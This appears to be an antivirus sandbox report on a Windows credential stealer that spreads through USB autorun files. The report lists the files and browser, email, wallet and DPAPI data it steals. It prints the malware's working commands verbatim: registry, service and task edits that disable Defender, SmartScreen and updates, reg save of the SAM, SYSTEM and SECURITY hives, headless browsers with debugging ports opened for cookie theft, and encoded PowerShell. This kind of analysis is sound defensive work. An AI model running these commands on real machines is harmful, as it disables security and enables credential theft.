Technical Information
To ensure autorun and distribution
Creates the following files on removable media
- <Drive name for removable media>:\system_recovery_tool.exe
- <Drive name for removable media>:\open files.lnk
- <Drive name for removable media>:\system volume information.lnk
- <Drive name for removable media>:\autorun.inf
- <Drive name for removable media>:\desktop.ini
Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Update
- Windows Defender
adds antivirus exclusion:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAUwBlA...
Executes the following
- '<SYSTEM32>\taskkill.exe' /f /im MsMpEng.exe
- '<SYSTEM32>\taskkill.exe' /f /im SecurityHealthService.exe
Patches code
in AMSI dll
- fsqh.exe process, Amsi.dll module
in NTDLL dll
- fsqh.exe process, ntdll.dll module
Searches for registry branches where third party applications store passwords
- [HKCU\Software\SimonTatham\PuTTY\Sessions]
- [HKCU\Software\Martin Prikryl\WinSCP 2\Sessions]
Reads files which store third party applications passwords
- %HOMEPATH%\desktop\1189.jpg
- %HOMEPATH%\desktop\2.jpeg
- %HOMEPATH%\desktop\2.jpg
- %HOMEPATH%\desktop\210252809.jpeg
- %HOMEPATH%\desktop\3.jpg
- %HOMEPATH%\desktop\508softwareandos.doc
- %HOMEPATH%\desktop\aoc_saq_d_v3_merchant.docx
- %HOMEPATH%\desktop\contoso.cer
- %HOMEPATH%\desktop\contosoroot.cer
- %HOMEPATH%\desktop\contosoroot_1.cer
- %HOMEPATH%\desktop\dashborder_120.bmp
- %HOMEPATH%\desktop\dashborder_96.bmp
- %HOMEPATH%\desktop\join.avi
- %HOMEPATH%\desktop\lisp_success.doc
- %HOMEPATH%\desktop\pushkin.jpg
- %HOMEPATH%\desktop\sdkfailsafeemulator.cer
- %HOMEPATH%\desktop\sdksampleprivdeveloper.cer
- %HOMEPATH%\desktop\sdszfo.docx
- %HOMEPATH%\desktop\split.avi
- %HOMEPATH%\desktop\tree_view.html
- %HOMEPATH%\desktop\uep_form_786_bulletin_1726i602.doc
- %LOCALAPPDATA%\google\chrome\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %LOCALAPPDATA%\microsoft\edge\user data\default\login data
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %LOCALAPPDATA%\microsoft\edge\user data\default\web data
Modifies file system
Creates the following files
- %TEMP%\sc_589e8c22749343a888550d07fc575927.jpg
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\key4.db
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\cert9.db
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\ssh_ftp_vpn\thunderbird\gbmwccb6.default-release\prefs.js
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\firefox\dnyauhh1.default-release\key4.db
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\firefox\dnyauhh1.default-release\cert9.db
- %TEMP%\774b2b03fa314131a87d73efa961412e\cookies.sqlite
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\clipboardhistory\activitiescache_l.user.db
- %TEMP%\774b2b03fa314131a87d73efa961412e\cookies.sqlite-shm
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\clipboardhistory\activitiescache_l.user.db-shm
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\firefox\dnyauhh1.default-release\places.sqlite
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\firefox\dnyauhh1.default-release\recovery.jsonlz4
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\email\outlook\profiles.txt
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\email\thunderbird\gbmwccb6.default-release\key4.db
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\email\thunderbird\gbmwccb6.default-release\cert9.db
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\email\thunderbird\gbmwccb6.default-release\prefs.js
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\email\thunderbird\gbmwccb6.default-release\places.sqlite
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\seedphrases\match_0_recovery.baklz4
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\seedphrases\original_1_recovery.baklz4
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\seedphrases\match_1_recovery.jsonlz4
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\seedphrases\original_2_recovery.jsonlz4
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\seedphrases\_summary.txt
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\usermasterkeys\37567def-af64-4cdd-b40b-25e1c51fe831
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\usermasterkeys\38ccf745-2ede-4301-8248-5a19e1f1901a
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\usermasterkeys\dd5bc7c6-8594-45bc-bd24-f453fba99ec4
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\usermasterkeys\preferred
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\usermasterkeys\preferred_guid.txt
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\recent_docs.txt
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\recentdocs\5f7b5f1e01b83767.automaticdestinations-ms
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\recentdocs\6824f4a902c78fbd.automaticdestinations-ms
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\recentdocs\f01b4d95cf55d32a.automaticdestinations-ms
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\recentdocs\f8f05350c84c9d76.automaticdestinations-ms
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\1189.jpg
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\2.jpeg
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\2.jpg
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\210252809.jpeg
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\3.jpg
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\508softwareandos.doc
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\aoc_saq_d_v3_merchant.docx
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\contoso.cer
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\contosoroot.cer
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\contosoroot_1.cer
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\dashborder_120.bmp
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\dashborder_96.bmp
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\desktop.ini
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\google chrome.lnk
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\join.avi
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\lisp_success.doc
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\notepad.exe
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\pushkin.jpg
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\sdkfailsafeemulator.cer
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\sdksampleprivdeveloper.cer
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\sdszfo.docx
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\split.avi
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\telegram.lnk
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\tree_view.html
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\uep_form_786_bulletin_1726i602.doc
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\desktop\utorrent.exe
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\installed_software.txt
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\recon\startup_items.txt
- %TEMP%\f664b42e4d514e648262316c78ba8d28.dmp
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\azuread_tokens\wincreds\microsoft_vault_policy.vpol
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\azuread_tokens\wincreds\microsoft_vault_latest.dat
- %TEMP%\6811d341cafa4c5baf93f04abde0db7c\login data
- %TEMP%\f9090b16653c4155938e2b8377cc9756\cookies
- %TEMP%\ed99210eaf714e6e98d907fec88367ad\login data
- %TEMP%\32bfb29874ee41e0ba3e8011dd4f70e9\history
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\readme.txt
- %TEMP%\a3e4ba5840834908ba14891b3442c3e0\web data
- %TEMP%\4b8354a61e2b4e0894ea66c192022887\web data
- %TEMP%\0a671e885e8f4924bcc416b422ef7480\history
- %TEMP%\01d3bed30dba491db30367173c6b9690\web data
- %TEMP%\e068cf0dc2a0459c8c9f9d457a71dd08\web data
- unc\pkenlpaiadum*\mailslot\net\netlogon
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\hives\sam.hiv
- %LOCALAPPDATA%\microsoft\edge\user data\devtoolsactiveport
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\hives\system.hiv
- %LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\index
- %LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_0
- %LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_2
- %LOCALAPPDATA%\microsoft\edge\user data\default\gpucache\data_3
- %TEMP%\etilqs_f5rlynuevzmr5x5
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\hives\security.hiv
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\systemmasterkeys\s-1-5-18_b5b05402-f755-40d0-b180-aac3f06b6b03
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\systemmasterkeys\s-1-5-18_e04a2b97-d5ab-4f9b-9035-85b2533b93e4
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\systemmasterkeys\s-1-5-18_preferred
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\systemmasterkeys\s-1-5-18_27438e7e-def9-4cf5-a9c7-570e92519588
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\dpapi\systemmasterkeys\s-1-5-18_b090579e-8e03-4690-86a9-77df802e69ea
- %APPDATA%\microsoft\windows\wmiprvse.exe
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\systeminfo.txt
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\browsers\history.txt
- %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\screenshot.jpg
- %TEMP%\syshost_user_pkenlpaiadum_20260615_201821.zip
Sets the 'hidden' attribute to the following files
- <Drive name for removable media>:\system_recovery_tool.exe
- <Drive name for removable media>:\autorun.inf
- <Drive name for removable media>:\desktop.ini
Deletes following files that it created itself
- %TEMP%\774b2b03fa314131a87d73efa961412e\cookies.sqlite
- %TEMP%\774b2b03fa314131a87d73efa961412e\cookies.sqlite-shm
- %TEMP%\6811d341cafa4c5baf93f04abde0db7c\login data
- %TEMP%\f9090b16653c4155938e2b8377cc9756\cookies
- %TEMP%\ed99210eaf714e6e98d907fec88367ad\login data
- %TEMP%\32bfb29874ee41e0ba3e8011dd4f70e9\history
- %TEMP%\a3e4ba5840834908ba14891b3442c3e0\web data
- %TEMP%\4b8354a61e2b4e0894ea66c192022887\web data
- %TEMP%\0a671e885e8f4924bcc416b422ef7480\history
- %TEMP%\01d3bed30dba491db30367173c6b9690\web data
- %TEMP%\e068cf0dc2a0459c8c9f9d457a71dd08\web data
Network activity
TCP
HTTP GET requests
- http://12#.#.0.1:9223/json
Other
- '1.#.1.1':443
- 'localhost':49697
- 'localhost':49698
UDP
- DNS ASK ap#.##legram.org
- DNS ASK google.com
Miscellaneous
Searches for the following windows
- ClassName: '' WindowName: ''
- ClassName: 'Chrome_MessageWindow' WindowName: '%LOCALAPPDATA%\Google\Chrome\User Data'
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAJgAgA...
- '<SYSTEM32>\sc.exe' config WinDefend start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- '<SYSTEM32>\sc.exe' stop WinDefend
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' config SecurityHealthService start= disabled
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\sc.exe' stop SecurityHealthService
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ForceDefenderPassiveMode /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' config Sense start= disabled
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' stop Sense
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /Disable
- '<SYSTEM32>\sc.exe' stop WdNisSvc
- '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work" /Disable
- '<SYSTEM32>\reg.exe' delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WindowsDefender /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
- '<SYSTEM32>\schtasks.exe' /Change /TN Microsoft\Windows\UpdateOrchestrator\Reboot /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
- '<SYSTEM32>\schtasks.exe' /Change /TN "Microsoft\Windows\WindowsUpdate\Scheduled Start" /Disable
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScriptScanning /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableArchiveScanning /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableEmailScanning /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' config wuauserv start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIntrusionPreventionSystem /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' stop wuauserv
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
- '<SYSTEM32>\sc.exe' config bits start= disabled
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpyNetReporting /t REG_DWORD /d 0 /f
- '<SYSTEM32>\sc.exe' stop bits
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableScheduledScan /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRemovableDriveScanning /t REG_DWORD /d 1 /f
- '<SYSTEM32>\cmd.exe' /c netsh wlan show profiles
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v DisableRestorePoint /t REG_DWORD /d 1 /f
- '<SYSTEM32>\netsh.exe' wlan show profiles
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v ForceUpdateFromMU /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v DisableUpdateOnStartupWithoutEngine /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Network Protection" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center" /v UILockdown /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v EnableSmartScreen /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\System /v ShellSmartScreenLevel /t REG_SZ /d Off /f
- '<SYSTEM32>\reg.exe' add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /t REG_DWORD /d 1 /f
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JgAgAHIAZQBnAC4AZQB4AGUAIABzAGEAdgBlACAASABLAEwATQBcAFMAQQBNACAAIgBDADoAXABVAHMAZQByAHMAXAB1AHMAZQByAFwAQQBwAHAARABhA...
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --remote-debugging-port=9223 --remote-allow-origins=* --headless=new --no-sandbox --disable-gpu --disable-dev-shm-usage --no-first-run --no-default-browser-check --disable-background-networking...
- '<SYSTEM32>\reg.exe' save HKLM\SAM %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\DPAPI\Hives\sam.hiv /y
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JgAgAHIAZQBnAC4AZQB4AGUAIABzAGEAdgBlACAASABLAEwATQBcAFMAWQBTAFQARQBNACAAIgBDADoAXABVAHMAZQByAHMAXAB1AHMAZQByAFwAQQBwA...
- '<SYSTEM32>\reg.exe' save HKLM\SYSTEM %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\DPAPI\Hives\system.hiv /y
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JgAgAHIAZQBnAC4AZQB4AGUAIABzAGEAdgBlACAASABLAEwATQBcAFMARQBDAFUAUgBJAFQAWQAgACIAQwA6AFwAVQBzAGUAcgBzAFwAdQBzAGUAcgBcA...
- '<SYSTEM32>\reg.exe' save HKLM\SECURITY %TEMP%\fbd35b23eb1f41ecbcb20307c7aeb0f2\DPAPI\Hives\security.hiv /y
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8ARgAgAC8AUwBDACAATwBOAEwATwBHAE8ATgAgAC8AUgBMACAATABJAE0ASQBUAEUARAAgA...
- '<SYSTEM32>\schtasks.exe' /Create /F /SC ONLOGON /RL LIMITED /TN WindowsUpdateAgent /TR \ %APPDATA%\Microsoft\Windows\WmiPrvSE.exe\ /IT
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAJgAgA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAUwBlA...' (with hidden window)
- '%LOCALAPPDATA%\google\chrome\application\chrome.exe' --remote-debugging-port=9222 --remote-allow-origins=* --headless=new --no-sandbox --disable-gpu --disable-dev-shm-usage --no-first-run --no-default-browser-check --disable-background-networking...' (with hidden window)
- '%ProgramFiles(x86)%\microsoft\edge\application\msedge.exe' --remote-debugging-port=9223 --remote-allow-origins=* --headless=new --no-sandbox --disable-gpu --disable-dev-shm-usage --no-first-run --no-default-browser-check --disable-background-networking...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NonInteractive -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand cwBjAGgAdABhAHMAawBzACAALwBDAHIAZQBhAHQAZQAgAC8ARgAgAC8AUwBDACAATwBOAEwATwBHAE8ATgAgAC8AUgBMACAATABJAE0ASQBUAEUARAAgA...' (with hidden window)
